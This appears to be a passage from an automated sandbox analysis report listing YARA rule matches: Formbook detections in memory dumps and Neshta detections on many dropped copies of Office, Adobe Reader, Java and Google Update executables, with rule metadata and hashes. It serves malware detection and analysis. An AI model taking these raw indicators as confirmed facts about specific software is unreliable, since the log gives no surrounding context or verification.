          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
